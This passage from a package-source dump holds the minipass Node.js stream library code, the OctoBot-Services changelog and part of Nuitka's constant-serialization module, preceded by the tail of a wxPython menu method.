        # the `height // 2` arithmetic used elsewhere in this class
        # (plain `/` would yield a float on Python 3).
        xpos = size[1] // 2
    self.PopupMenu(self._menu, (xpos, size[1] + adj))
#---- End Public Member Functions ----# | PypiClean |
/Newcalls-0.0.1-cp37-cp37m-win_amd64.whl/newcalls/node_modules/minipass/index.js | 'use strict'
// Fallback for non-Node environments where `process` is absent;
// only stdout/stderr are consulted (see pipe()).
const proc =
  typeof process === 'object' && process
    ? process
    : {
        stdout: null,
        stderr: null,
      }
const EE = require('events')
const Stream = require('stream')
const stringdecoder = require('string_decoder')
const SD = stringdecoder.StringDecoder
// Symbols used to keep internal state off the public property namespace.
const EOF = Symbol('EOF')
const MAYBE_EMIT_END = Symbol('maybeEmitEnd')
const EMITTED_END = Symbol('emittedEnd')
const EMITTING_END = Symbol('emittingEnd')
const EMITTED_ERROR = Symbol('emittedError')
const CLOSED = Symbol('closed')
const READ = Symbol('read')
const FLUSH = Symbol('flush')
const FLUSHCHUNK = Symbol('flushChunk')
const ENCODING = Symbol('encoding')
const DECODER = Symbol('decoder')
const FLOWING = Symbol('flowing')
const PAUSED = Symbol('paused')
const RESUME = Symbol('resume')
const BUFFER = Symbol('buffer')
const PIPES = Symbol('pipes')
const BUFFERLENGTH = Symbol('bufferLength')
const BUFFERPUSH = Symbol('bufferPush')
const BUFFERSHIFT = Symbol('bufferShift')
const OBJECTMODE = Symbol('objectMode')
// internal event when stream is destroyed
const DESTROYED = Symbol('destroyed')
// internal event when stream has an error
const ERROR = Symbol('error')
const EMITDATA = Symbol('emitData')
const EMITEND = Symbol('emitEnd')
const EMITEND2 = Symbol('emitEnd2')
const ASYNC = Symbol('async')
const ABORT = Symbol('abort')
const ABORTED = Symbol('aborted')
const SIGNAL = Symbol('signal')
// Run fn on the microtask queue (used when the 'async' option is set).
const defer = fn => Promise.resolve().then(fn)
// TODO remove when Node v8 support drops
const doIter = global._MP_NO_ITERATOR_SYMBOLS_ !== '1'
const ASYNCITERATOR =
  (doIter && Symbol.asyncIterator) || Symbol('asyncIterator not implemented')
const ITERATOR =
  (doIter && Symbol.iterator) || Symbol('iterator not implemented')
// events that mean 'the stream is over'
// these are treated specially, and re-emitted
// if they are listened for after emitting.
const isEndish = ev => ev === 'end' || ev === 'finish' || ev === 'prefinish'
// Duck-typed ArrayBuffer check: also matches buffers from other realms
// whose constructor identity differs.
const isArrayBuffer = b =>
  b instanceof ArrayBuffer ||
  (typeof b === 'object' &&
    b.constructor &&
    b.constructor.name === 'ArrayBuffer' &&
    b.byteLength >= 0)
const isArrayBufferView = b => !Buffer.isBuffer(b) && ArrayBuffer.isView(b)
/**
 * Internal record of a single pipe destination. Wires the destination's
 * 'drain' event back to resuming the source stream.
 */
class Pipe {
  constructor(src, dest, opts) {
    this.src = src
    this.dest = dest
    this.opts = opts
    this.ondrain = () => src[RESUME]()
    dest.on('drain', this.ondrain)
  }
  unpipe() {
    this.dest.removeListener('drain', this.ondrain)
  }
  // istanbul ignore next - only here for the prototype
  proxyErrors() {}
  end() {
    this.unpipe()
    if (this.opts.end) this.dest.end()
  }
}
/**
 * Pipe variant that also forwards 'error' events from the source to the
 * destination (enabled via the `proxyErrors` pipe option).
 */
class PipeProxyErrors extends Pipe {
  unpipe() {
    this.src.removeListener('error', this.proxyErrors)
    super.unpipe()
  }
  constructor(src, dest, opts) {
    super(src, dest, opts)
    this.proxyErrors = er => dest.emit('error', er)
    src.on('error', this.proxyErrors)
  }
}
/**
 * Minipass: a minimal, mostly-synchronous implementation of the Node.js
 * stream interface.
 *
 * Unlike core streams, data events are emitted synchronously by default
 * (opt into microtask-deferred emits with `options.async`). Supports
 * objectMode, string encodings, piping, AbortSignal, and both sync and
 * async iteration.
 */
class Minipass extends Stream {
  constructor(options) {
    super()
    this[FLOWING] = false
    // whether we're explicitly paused
    this[PAUSED] = false
    this[PIPES] = []
    this[BUFFER] = []
    this[OBJECTMODE] = (options && options.objectMode) || false
    if (this[OBJECTMODE]) this[ENCODING] = null
    else this[ENCODING] = (options && options.encoding) || null
    if (this[ENCODING] === 'buffer') this[ENCODING] = null
    this[ASYNC] = (options && !!options.async) || false
    this[DECODER] = this[ENCODING] ? new SD(this[ENCODING]) : null
    this[EOF] = false
    this[EMITTED_END] = false
    this[EMITTING_END] = false
    this[CLOSED] = false
    this[EMITTED_ERROR] = null
    this.writable = true
    this.readable = true
    this[BUFFERLENGTH] = 0
    this[DESTROYED] = false
    // Debug hooks: expose internal buffer/pipes as read-only getters.
    if (options && options.debugExposeBuffer === true) {
      Object.defineProperty(this, 'buffer', { get: () => this[BUFFER] })
    }
    if (options && options.debugExposePipes === true) {
      Object.defineProperty(this, 'pipes', { get: () => this[PIPES] })
    }
    this[SIGNAL] = options && options.signal
    this[ABORTED] = false
    if (this[SIGNAL]) {
      this[SIGNAL].addEventListener('abort', () => this[ABORT]())
      if (this[SIGNAL].aborted) {
        this[ABORT]()
      }
    }
  }
  get bufferLength() {
    return this[BUFFERLENGTH]
  }
  get encoding() {
    return this[ENCODING]
  }
  // Changing encoding is only allowed before any partial decode state or
  // buffered data exists.
  set encoding(enc) {
    if (this[OBJECTMODE]) throw new Error('cannot set encoding in objectMode')
    if (
      this[ENCODING] &&
      enc !== this[ENCODING] &&
      ((this[DECODER] && this[DECODER].lastNeed) || this[BUFFERLENGTH])
    )
      throw new Error('cannot change encoding')
    if (this[ENCODING] !== enc) {
      this[DECODER] = enc ? new SD(enc) : null
      if (this[BUFFER].length)
        this[BUFFER] = this[BUFFER].map(chunk => this[DECODER].write(chunk))
    }
    this[ENCODING] = enc
  }
  setEncoding(enc) {
    this.encoding = enc
  }
  get objectMode() {
    return this[OBJECTMODE]
  }
  // objectMode can be switched on, never off.
  set objectMode(om) {
    this[OBJECTMODE] = this[OBJECTMODE] || !!om
  }
  get ['async']() {
    return this[ASYNC]
  }
  // async can be switched on, never off.
  set ['async'](a) {
    this[ASYNC] = this[ASYNC] || !!a
  }
  // drop everything and get out of the flow completely
  [ABORT]() {
    this[ABORTED] = true
    this.emit('abort', this[SIGNAL].reason)
    this.destroy(this[SIGNAL].reason)
  }
  get aborted() {
    return this[ABORTED]
  }
  set aborted(_) {}
  /**
   * Write a chunk. Returns true while flowing (more writes welcome),
   * false if the data was buffered (back-pressure).
   */
  write(chunk, encoding, cb) {
    if (this[ABORTED]) return false
    if (this[EOF]) throw new Error('write after end')
    if (this[DESTROYED]) {
      this.emit(
        'error',
        Object.assign(
          new Error('Cannot call write after a stream was destroyed'),
          { code: 'ERR_STREAM_DESTROYED' }
        )
      )
      return true
    }
    if (typeof encoding === 'function') (cb = encoding), (encoding = 'utf8')
    if (!encoding) encoding = 'utf8'
    const fn = this[ASYNC] ? defer : f => f()
    // convert array buffers and typed array views into buffers
    // at some point in the future, we may want to do the opposite!
    // leave strings and buffers as-is
    // anything else switches us into object mode
    if (!this[OBJECTMODE] && !Buffer.isBuffer(chunk)) {
      if (isArrayBufferView(chunk))
        chunk = Buffer.from(chunk.buffer, chunk.byteOffset, chunk.byteLength)
      else if (isArrayBuffer(chunk)) chunk = Buffer.from(chunk)
      else if (typeof chunk !== 'string')
        // use the setter so we throw if we have encoding set
        this.objectMode = true
    }
    // handle object mode up front, since it's simpler
    // this yields better performance, fewer checks later.
    if (this[OBJECTMODE]) {
      /* istanbul ignore if - maybe impossible? */
      if (this.flowing && this[BUFFERLENGTH] !== 0) this[FLUSH](true)
      if (this.flowing) this.emit('data', chunk)
      else this[BUFFERPUSH](chunk)
      if (this[BUFFERLENGTH] !== 0) this.emit('readable')
      if (cb) fn(cb)
      return this.flowing
    }
    // at this point the chunk is a buffer or string
    // don't buffer it up or send it to the decoder
    if (!chunk.length) {
      if (this[BUFFERLENGTH] !== 0) this.emit('readable')
      if (cb) fn(cb)
      return this.flowing
    }
    // fast-path writing strings of same encoding to a stream with
    // an empty buffer, skipping the buffer/decoder dance
    if (
      typeof chunk === 'string' &&
      // unless it is a string already ready for us to use
      !(encoding === this[ENCODING] && !this[DECODER].lastNeed)
    ) {
      chunk = Buffer.from(chunk, encoding)
    }
    if (Buffer.isBuffer(chunk) && this[ENCODING])
      chunk = this[DECODER].write(chunk)
    // Note: flushing CAN potentially switch us into not-flowing mode
    if (this.flowing && this[BUFFERLENGTH] !== 0) this[FLUSH](true)
    if (this.flowing) this.emit('data', chunk)
    else this[BUFFERPUSH](chunk)
    if (this[BUFFERLENGTH] !== 0) this.emit('readable')
    if (cb) fn(cb)
    return this.flowing
  }
  /**
   * Pull n bytes (or one object, or everything if n is null) from the
   * buffer. Returns null if the request cannot be fully satisfied.
   */
  read(n) {
    if (this[DESTROYED]) return null
    if (this[BUFFERLENGTH] === 0 || n === 0 || n > this[BUFFERLENGTH]) {
      this[MAYBE_EMIT_END]()
      return null
    }
    if (this[OBJECTMODE]) n = null
    if (this[BUFFER].length > 1 && !this[OBJECTMODE]) {
      // consolidate the buffer so a partial read can slice one chunk
      if (this.encoding) this[BUFFER] = [this[BUFFER].join('')]
      else this[BUFFER] = [Buffer.concat(this[BUFFER], this[BUFFERLENGTH])]
    }
    const ret = this[READ](n || null, this[BUFFER][0])
    this[MAYBE_EMIT_END]()
    return ret
  }
  [READ](n, chunk) {
    if (n === chunk.length || n === null) this[BUFFERSHIFT]()
    else {
      // partial read: keep the remainder at the head of the buffer
      this[BUFFER][0] = chunk.slice(n)
      chunk = chunk.slice(0, n)
      this[BUFFERLENGTH] -= n
    }
    this.emit('data', chunk)
    if (!this[BUFFER].length && !this[EOF]) this.emit('drain')
    return chunk
  }
  end(chunk, encoding, cb) {
    if (typeof chunk === 'function') (cb = chunk), (chunk = null)
    if (typeof encoding === 'function') (cb = encoding), (encoding = 'utf8')
    if (chunk) this.write(chunk, encoding)
    if (cb) this.once('end', cb)
    this[EOF] = true
    this.writable = false
    // if we haven't written anything, then go ahead and emit,
    // even if we're not reading.
    // we'll re-emit if a new 'end' listener is added anyway.
    // This makes MP more suitable to write-only use cases.
    if (this.flowing || !this[PAUSED]) this[MAYBE_EMIT_END]()
    return this
  }
  // don't let the internal resume be overwritten
  [RESUME]() {
    if (this[DESTROYED]) return
    this[PAUSED] = false
    this[FLOWING] = true
    this.emit('resume')
    if (this[BUFFER].length) this[FLUSH]()
    else if (this[EOF]) this[MAYBE_EMIT_END]()
    else this.emit('drain')
  }
  resume() {
    return this[RESUME]()
  }
  pause() {
    this[FLOWING] = false
    this[PAUSED] = true
  }
  get destroyed() {
    return this[DESTROYED]
  }
  get flowing() {
    return this[FLOWING]
  }
  get paused() {
    return this[PAUSED]
  }
  // In objectMode bufferLength counts chunks; otherwise it counts bytes.
  [BUFFERPUSH](chunk) {
    if (this[OBJECTMODE]) this[BUFFERLENGTH] += 1
    else this[BUFFERLENGTH] += chunk.length
    this[BUFFER].push(chunk)
  }
  [BUFFERSHIFT]() {
    if (this[OBJECTMODE]) this[BUFFERLENGTH] -= 1
    else this[BUFFERLENGTH] -= this[BUFFER][0].length
    return this[BUFFER].shift()
  }
  // Drain the buffer through 'data' events until empty or un-flowed.
  [FLUSH](noDrain) {
    do {} while (this[FLUSHCHUNK](this[BUFFERSHIFT]()) && this[BUFFER].length)
    if (!noDrain && !this[BUFFER].length && !this[EOF]) this.emit('drain')
  }
  [FLUSHCHUNK](chunk) {
    this.emit('data', chunk)
    return this.flowing
  }
  /**
   * Pipe this stream into a writable destination. Options:
   * `end` (default true, forced false for stdout/stderr) and
   * `proxyErrors` (forward source errors to dest).
   */
  pipe(dest, opts) {
    if (this[DESTROYED]) return
    const ended = this[EMITTED_END]
    opts = opts || {}
    if (dest === proc.stdout || dest === proc.stderr) opts.end = false
    else opts.end = opts.end !== false
    opts.proxyErrors = !!opts.proxyErrors
    // piping an ended stream ends immediately
    if (ended) {
      if (opts.end) dest.end()
    } else {
      this[PIPES].push(
        !opts.proxyErrors
          ? new Pipe(this, dest, opts)
          : new PipeProxyErrors(this, dest, opts)
      )
      if (this[ASYNC]) defer(() => this[RESUME]())
      else this[RESUME]()
    }
    return dest
  }
  unpipe(dest) {
    const p = this[PIPES].find(p => p.dest === dest)
    if (p) {
      this[PIPES].splice(this[PIPES].indexOf(p), 1)
      p.unpipe()
    }
  }
  addListener(ev, fn) {
    return this.on(ev, fn)
  }
  // Listener registration has side effects: 'data' starts the flow,
  // 'readable'/end-ish/'error' may replay already-emitted events.
  on(ev, fn) {
    const ret = super.on(ev, fn)
    if (ev === 'data' && !this[PIPES].length && !this.flowing) this[RESUME]()
    else if (ev === 'readable' && this[BUFFERLENGTH] !== 0)
      super.emit('readable')
    else if (isEndish(ev) && this[EMITTED_END]) {
      super.emit(ev)
      this.removeAllListeners(ev)
    } else if (ev === 'error' && this[EMITTED_ERROR]) {
      if (this[ASYNC]) defer(() => fn.call(this, this[EMITTED_ERROR]))
      else fn.call(this, this[EMITTED_ERROR])
    }
    return ret
  }
  get emittedEnd() {
    return this[EMITTED_END]
  }
  // Emit 'end' (and friends) once the buffer is drained after end().
  [MAYBE_EMIT_END]() {
    if (
      !this[EMITTING_END] &&
      !this[EMITTED_END] &&
      !this[DESTROYED] &&
      this[BUFFER].length === 0 &&
      this[EOF]
    ) {
      this[EMITTING_END] = true
      this.emit('end')
      this.emit('prefinish')
      this.emit('finish')
      if (this[CLOSED]) this.emit('close')
      this[EMITTING_END] = false
    }
  }
  // Central emit override implementing ordering guarantees and the
  // sync/async emit behavior for the special lifecycle events.
  emit(ev, data, ...extra) {
    // error and close are only events allowed after calling destroy()
    if (ev !== 'error' && ev !== 'close' && ev !== DESTROYED && this[DESTROYED])
      return
    else if (ev === 'data') {
      return !this[OBJECTMODE] && !data
        ? false
        : this[ASYNC]
        ? defer(() => this[EMITDATA](data))
        : this[EMITDATA](data)
    } else if (ev === 'end') {
      return this[EMITEND]()
    } else if (ev === 'close') {
      this[CLOSED] = true
      // don't emit close before 'end' and 'finish'
      if (!this[EMITTED_END] && !this[DESTROYED]) return
      const ret = super.emit('close')
      this.removeAllListeners('close')
      return ret
    } else if (ev === 'error') {
      this[EMITTED_ERROR] = data
      super.emit(ERROR, data)
      const ret =
        !this[SIGNAL] || this.listeners('error').length
          ? super.emit('error', data)
          : false
      this[MAYBE_EMIT_END]()
      return ret
    } else if (ev === 'resume') {
      const ret = super.emit('resume')
      this[MAYBE_EMIT_END]()
      return ret
    } else if (ev === 'finish' || ev === 'prefinish') {
      const ret = super.emit(ev)
      this.removeAllListeners(ev)
      return ret
    }
    // Some other unknown event
    const ret = super.emit(ev, data, ...extra)
    this[MAYBE_EMIT_END]()
    return ret
  }
  [EMITDATA](data) {
    for (const p of this[PIPES]) {
      // pause on back-pressure from any pipe destination
      if (p.dest.write(data) === false) this.pause()
    }
    const ret = super.emit('data', data)
    this[MAYBE_EMIT_END]()
    return ret
  }
  [EMITEND]() {
    if (this[EMITTED_END]) return
    this[EMITTED_END] = true
    this.readable = false
    if (this[ASYNC]) defer(() => this[EMITEND2]())
    else this[EMITEND2]()
  }
  [EMITEND2]() {
    if (this[DECODER]) {
      // flush any partial multi-byte character held by the decoder
      const data = this[DECODER].end()
      if (data) {
        for (const p of this[PIPES]) {
          p.dest.write(data)
        }
        super.emit('data', data)
      }
    }
    for (const p of this[PIPES]) {
      p.end()
    }
    const ret = super.emit('end')
    this.removeAllListeners('end')
    return ret
  }
  // const all = await stream.collect()
  collect() {
    const buf = []
    if (!this[OBJECTMODE]) buf.dataLength = 0
    // set the promise first, in case an error is raised
    // by triggering the flow here.
    const p = this.promise()
    this.on('data', c => {
      buf.push(c)
      if (!this[OBJECTMODE]) buf.dataLength += c.length
    })
    return p.then(() => buf)
  }
  // const data = await stream.concat()
  concat() {
    return this[OBJECTMODE]
      ? Promise.reject(new Error('cannot concat in objectMode'))
      : this.collect().then(buf =>
          this[OBJECTMODE]
            ? Promise.reject(new Error('cannot concat in objectMode'))
            : this[ENCODING]
            ? buf.join('')
            : Buffer.concat(buf, buf.dataLength)
        )
  }
  // stream.promise().then(() => done, er => emitted error)
  promise() {
    return new Promise((resolve, reject) => {
      this.on(DESTROYED, () => reject(new Error('stream destroyed')))
      this.on('error', er => reject(er))
      this.on('end', () => resolve())
    })
  }
  // for await (let chunk of stream)
  [ASYNCITERATOR]() {
    let stopped = false
    const stop = () => {
      this.pause()
      stopped = true
      return Promise.resolve({ done: true })
    }
    const next = () => {
      if (stopped) return stop()
      const res = this.read()
      if (res !== null) return Promise.resolve({ done: false, value: res })
      if (this[EOF]) return stop()
      // nothing buffered yet: wait for data/end/error/destroy, removing
      // the competing listeners once one of them fires
      let resolve = null
      let reject = null
      const onerr = er => {
        this.removeListener('data', ondata)
        this.removeListener('end', onend)
        this.removeListener(DESTROYED, ondestroy)
        stop()
        reject(er)
      }
      const ondata = value => {
        this.removeListener('error', onerr)
        this.removeListener('end', onend)
        this.removeListener(DESTROYED, ondestroy)
        this.pause()
        resolve({ value: value, done: !!this[EOF] })
      }
      const onend = () => {
        this.removeListener('error', onerr)
        this.removeListener('data', ondata)
        this.removeListener(DESTROYED, ondestroy)
        stop()
        resolve({ done: true })
      }
      const ondestroy = () => onerr(new Error('stream destroyed'))
      return new Promise((res, rej) => {
        reject = rej
        resolve = res
        this.once(DESTROYED, ondestroy)
        this.once('error', onerr)
        this.once('end', onend)
        this.once('data', ondata)
      })
    }
    return {
      next,
      throw: stop,
      return: stop,
      [ASYNCITERATOR]() {
        return this
      },
    }
  }
  // for (let chunk of stream)
  [ITERATOR]() {
    let stopped = false
    const stop = () => {
      this.pause()
      this.removeListener(ERROR, stop)
      this.removeListener(DESTROYED, stop)
      this.removeListener('end', stop)
      stopped = true
      return { done: true }
    }
    const next = () => {
      if (stopped) return stop()
      const value = this.read()
      return value === null ? stop() : { value }
    }
    this.once('end', stop)
    this.once(ERROR, stop)
    this.once(DESTROYED, stop)
    return {
      next,
      throw: stop,
      return: stop,
      [ITERATOR]() {
        return this
      },
    }
  }
  destroy(er) {
    if (this[DESTROYED]) {
      if (er) this.emit('error', er)
      else this.emit(DESTROYED)
      return this
    }
    this[DESTROYED] = true
    // throw away all buffered data, it's never coming out
    this[BUFFER].length = 0
    this[BUFFERLENGTH] = 0
    // duck-typed close() support (e.g. fs streams)
    if (typeof this.close === 'function' && !this[CLOSED]) this.close()
    if (er) this.emit('error', er)
    // if no error to emit, still reject pending promises
    else this.emit(DESTROYED)
    return this
  }
  static isStream(s) {
    return (
      !!s &&
      (s instanceof Minipass ||
        s instanceof Stream ||
        (s instanceof EE &&
          // readable
          (typeof s.pipe === 'function' ||
            // writable
            (typeof s.write === 'function' && typeof s.end === 'function'))))
    )
  }
}
exports.Minipass = Minipass | PypiClean |
/OctoBot-Services-1.6.2.tar.gz/OctoBot-Services-1.6.2/CHANGELOG.md | # Changelog
All notable changes to this project will be documented in this file.
The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),
and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
## [1.6.2] - 2023-08-18
### Updated
- [Requirements] update dependencies
## [1.6.1] - 2023-07-23
### Updated
- [ReturningStartable] add threaded_start
## [1.6.0] - 2023-05-02
### Updated
- Supported python versions
## [1.5.6] - 2023-05-02
### Updated
- [Dependencies] flask, ngrok and openai
## [1.5.5] - 2023-04-23
### Updated
- [BotInterface] set_risk command now updated edited config
## [1.5.4] - 2023-03-30
### Updated
- [Orders] Order channel callback
## [1.5.3] - 2023-03-29
### Added
- [Services] Add GPT requirements
### Updated
- [Services] Dependencies
## [1.5.2] - 2023-03-24
### Updated
- [Services] Improve portfolio output
## [1.5.1] - 2023-03-22
### Updated
- [Services] Add reference market value in portfolio pretty print
## [1.5.0] - 2023-03-15
### Updated
- [Services] stop is now async
- [Telegram] migrate to async version of the lib
## [1.4.4] - 2023-03-01
### Updated
- [API] trading apis
## [1.4.3] - 2023-02-04
### Updated
- [NotificationLevel] replace DANGER by ERROR
## [1.4.2] - 2023-02-03
### Removed
- [Requirements] Python-Twitter as Twitter API will become paid only
## [1.4.1] - 2022-12-29
### Added
- [Requirements] flask_cors
## [1.4.0] - 2022-12-23
### Updated
- [Requirements] Bump
## [1.3.10] - 2022-12-13
### Updated
- [Requirements] Restore gevent==22.10.2
## [1.3.9] - 2022-12-11
### Updated
- [Requirements] Restore gevent==21.12.0 due to glibc incompatibility (https://github.com/gevent/gevent/blob/master/CHANGES.rst#22102-2022-10-31)
## [1.3.8] - 2022-12-09
### Updated
- [Requirements] bump requirements
## [1.3.7] - 2022-10-17
### Updated
- [Positions] close position
## [1.3.6] - 2022-09-08
### Updated
- [AsyncTools] add timeout param
## [1.3.5] - 2022-08-25
### Updated
- [Dependencies] update to latest reddit, telegram, ngrok and flask versions
## [1.3.4] - 2022-08-11
### Updated
- [AsyncTools] add log_exceptions param
## [1.3.3] - 2022-07-29
### Updated
- [Requirements] bump web interface requirements
## [1.3.2] - 2022-07-02
### Updated
- [Requirements] bump requirements
## [1.3.1] - 2022-06-06
### Updated
- [Notifications] always create notification channel
## [1.3.0] - 2022-05-04
### Added
- Notification sounds
### Updated
- Flask requirement
## [1.2.32] - 2022-02-18
### Updated
- Flask requirement
## [1.2.31] - 2022-01-20
### Updated
- requirements
## [1.2.30] - 2022-01-16
### Updated
- requirements
### Fixed
- [Telegram] RPC login error
## [1.2.29] - 2021-12-19
### Updated
- [Util][Portfolio] Migrate to assets
## [1.2.28] - 2021-11-24
### Added
- [Constants] CONFIG_ENABLE_NGROK
## [1.2.27] - 2021-10-28
### Added
- flask-compress requirements
- flask-cache requirements
## [1.2.26] - 2021-09-21
### Updated
- requirements
## [1.2.25] - 2021-09-13
### Added
- AbstractBotInterface set_command_restart method
## [1.2.24] - 2021-09-03
### Updated
- requirements
## [1.2.23] - 2021-07-28
### Updated
- requirements
## [1.2.22] - 2021-07-17
### Updated
- changed missing configuration warning into info
- requirements
## [1.2.21] - 2021-07-09
### Updated
- requirements
## [1.2.20] - 2021-07-03
### Added
- CONFIG_ENABLE_NGROK constants
- CONFIG_WEBHOOK_SERVER_IP
- CONFIG_WEBHOOK_SERVER_PORT
## [1.2.19] - 2021-05-03
### Added
- async reddit api via asyncpraw
### Updated
- gevent and python-telegram-bot versions
## [1.2.18] - 2021-04-22
### Updated
- simplifiedpytrends version
## [1.2.17] - 2021-04-14
### Added
- CONFIG_MEDIA_PATH constant
## [1.2.16] - 2021-04-09
### Added
- telethon
- telegram api constants
## [1.2.15] - 2021-04-08
### Updated
- pyngrok version
## [1.2.14] - 2021-03-26
### Updated
- Requirements
## [1.2.13] - 2021-03-15
### Added
- User commands channel
## [1.2.12] - 2021-03-03
### Added
- Python 3.9 support
## [1.2.11] - 2021-01-04
### Updated
- requirements
## [1.2.10] - 2020-12-23
### Fixed
- has_trader exception
## [1.2.9] - 2020-12-23
### Added
- Profiles handling
### Fixed
- No activated trader situations
## [1.2.8] - 2020-12-16
### Updated
- Push notifications using async executor
- flask-socketio to 5.0.0
## [1.2.7] - 2020-12-06
### Fixed
- Notifiers when no config data
## [1.2.6] - 2020-11-26
### Added
- Services logo and url
## [1.2.5] - 2020-11-14
### Added
- Services logo and url
## [1.2.4] - 2020-11-07
### Updated
- Requirements
## [1.2.3] - 2020-10-27
### Updated
- Services warnings and errors on config issues
## [1.2.2] - 2020-10-26
### Updated
- Requirements
### Fixed
- Service init
## [1.2.1] - 2020-10-23
### Updated
- Python 3.8 support
## [1.2.0] - 2020-10-06
### Updated
- Migrate imports
## [1.1.22] - 2020-09-02
### Updated
- Order notifications for new order states management
## [1.1.21] - 2020-08-31
### Updated
- Order notifications for new order states management
## [1.1.20] - 2020-08-23
### Updated
- Requirements
## [1.1.19] - 2020-08-15
### Updated
- Requirements
## [1.1.18] - 2020-07-19
### Updated
- Refresh real trader changed into refresh portfolio
- Requirements
## [1.1.17] - 2020-06-21
### Updated
- Requirements
## [1.1.16] - 2020-06-20
### Fixed
- Services config update error
## [1.1.15] - 2020-06-07
### Updated
- Handle non trading exchanges
## [1.1.14] - 2020-06-02
### Added
- Web login
## [1.1.13] - 2020-05-27
### Updated
- Cython version
## [1.1.12] - 2020-05-26
### Updated
- Requirements
## [1.1.11] - 2020-05-21
### Updated
- Remove advanced manager from commons
## [1.1.10] - 2020-05-19
### Added
- Config constants
## [1.1.9] - 2020-05-19
### Added
- OctoBot channels initialization
## [1.1.8] - 2020-05-18
### Added
- run_in_bot_async_executor util function
## [1.1.7] - 2020-05-17
### Fixed
- Bot interface config command
## [1.1.6] - 2020-05-16
### Updated
- Requirements
## [1.1.5] - 2020-05-15
### Updated
- OctoBot requirements
## [1.1.4] - 2020-05-10
### Updated
- Stop interface
- Telegram requirement
## [1.1.3] - 2020-05-10
### Updated
- Channel requirement
- Commons requirement
- Trading requirement
## [1.1.2] - 2020-05-06
### Added
- [Service] Webhook
## [1.1.1] - 2020-05-03
### Added
- Can now edit user config in services
## [1.1.0] - 2020-05-02
### Updated
- Octobot backtesting import paths
## [1.0.8] - 2020-05-01
### Added
- Include interfaces and notifications
## [1.0.7] - 2020-05-01
### Updated
- Handle multiple services for service feeds and interfaces
## [1.0.6] - 2020-04-17
### Updated
- python-telegram-bot requirement
## [1.0.5] - 2020-04-13
### Added
- ENV_WEB_ADDRESS environment constant
## [1.0.4] - 2020-04-13
### Added
- WEB_PORT environment constant
## [1.0.3] - 2020-04-10
### Added
- get_backtesting_service_feed api
- Service feed handling
## [1.0.2] - 2020-04-04
### Updated
- Requirements version
### Fixed
- Travis CI file
## [1.0.1] - 2020-11-02
### Added
- Version update
## [1.0.0] - 2020-01-02
### Added
- Services
- Service-feeds
| PypiClean |
/Nuitka_winsvc-1.7.10-cp310-cp310-win_amd64.whl/nuitka/Serialization.py | import os
import pickle
import sys
from nuitka import OutputDirectories
from nuitka.__past__ import ( # pylint: disable=I0021,redefined-builtin
BaseExceptionGroup,
ExceptionGroup,
GenericAlias,
UnionType,
basestring,
to_byte,
xrange,
)
from nuitka.Builtins import (
builtin_anon_codes,
builtin_anon_values,
builtin_exception_values_list,
)
# TODO: Move to constants
from nuitka.code_generation.Namify import namifyConstant
from nuitka.containers.OrderedSets import OrderedSet
from nuitka.PythonVersions import python_version
from nuitka.utils.FileOperations import openTextFile
class BuiltinAnonValue(object):
    """Pickle stand-in for anonymous built-in values.

    Holds the name of the anonymous built-in; the stream encoding is the
    position of that name inside the tuple of known anonymous values.
    """

    # Python3 values has no index, turn into a tuple.
    anon_values = tuple(builtin_anon_values.values())

    def __init__(self, anon_name):
        self.anon_name = anon_name

    def getStreamValueByte(self):
        """Return byte value, encoding the anon built-in value."""
        position = self.anon_values.index(self.anon_name)
        return to_byte(position)
class BuiltinGenericAliasValue(object):
    """Transport wrapper carrying a ``GenericAlias`` through the pickler."""

    def __init__(self, origin, args):
        self.args = args
        self.origin = origin
class BuiltinUnionTypeValue(object):
    """Transport wrapper carrying a ``UnionType`` through the pickler."""

    def __init__(self, args):
        # The union members, e.g. (int, str) for "int | str".
        self.args = args
class BuiltinSpecialValue(object):
    """Pickle stand-in for special built-in singleton values."""

    # Byte codes used in the constants stream; currently the only ones.
    _stream_codes = {"Ellipsis": 0, "NotImplemented": 1, "Py_SysVersionInfo": 2}

    def __init__(self, value):
        self.value = value

    def getStreamValueByte(self):
        """Return byte value, encoding the special built-in value."""
        assert self.value in self._stream_codes, self.value
        return to_byte(self._stream_codes[self.value])
class BlobData(object):
    """Wrapper for raw bytes that become C-level data pointers when pickled."""

    __slots__ = ("data", "name")

    def __init__(self, data, name):
        self.name = name
        self.data = data

    def getData(self):
        """Return the wrapped raw bytes."""
        return self.data

    def __repr__(self):
        return "<nuitka.Serialization.BlobData {}>".format(self.name)
def _pickleAnonValues(pickler, value):
    """Pickler dispatch hook encoding anonymous and special built-in values."""
    if value in builtin_anon_values:
        pickler.save(BuiltinAnonValue(builtin_anon_values[value]))
        return

    if value is Ellipsis:
        pickler.save(BuiltinSpecialValue("Ellipsis"))
    elif value is NotImplemented:
        pickler.save(BuiltinSpecialValue("NotImplemented"))
    elif value is sys.version_info:
        pickler.save(BuiltinSpecialValue("Py_SysVersionInfo"))
    else:
        # Anything else falls back to the normal global-reference pickling.
        pickler.save_global(value)
def _pickleGenericAlias(pickler, value):
    """Pickler dispatch hook wrapping a ``GenericAlias`` for transport."""
    wrapped = BuiltinGenericAliasValue(origin=value.__origin__, args=value.__args__)
    pickler.save(wrapped)
def _pickleUnionType(pickler, value):
    """Pickler dispatch hook wrapping a ``UnionType`` for transport."""
    wrapped = BuiltinUnionTypeValue(args=value.__args__)
    pickler.save(wrapped)
class ConstantStreamWriter(object):
    """Write constants to a stream and return numbers for them."""

    def __init__(self, filename):
        # Number of constants written so far.
        self.count = 0
        filename = os.path.join(OutputDirectories.getSourceDirectoryPath(), filename)
        # NOTE(review): opened with "wb" despite the helper's name -- the
        # pickle stream is binary; confirm openTextFile accepts binary modes.
        self.file = openTextFile(filename, "wb")
        if python_version < 0x300:
            self.pickle = pickle.Pickler(self.file, -1)
        else:
            # The pure Python pickler is used on Python3 so its per-type
            # dispatch table can be patched below; the C pickler cannot be.
            self.pickle = pickle._Pickler(  # pylint: disable=I0021,protected-access
                self.file, -1
            )
        # Route values the stock pickler cannot handle through our wrappers:
        # type objects, Ellipsis, NotImplemented, and sys.version_info.
        self.pickle.dispatch[type] = _pickleAnonValues
        self.pickle.dispatch[type(Ellipsis)] = _pickleAnonValues
        self.pickle.dispatch[type(NotImplemented)] = _pickleAnonValues
        if type(sys.version_info) is not tuple:
            self.pickle.dispatch[type(sys.version_info)] = _pickleAnonValues
        # Standard pickling doesn't work with our necessary wrappers.
        if python_version >= 0x390:
            self.pickle.dispatch[GenericAlias] = _pickleGenericAlias
        if python_version >= 0x3A0:
            self.pickle.dispatch[UnionType] = _pickleUnionType
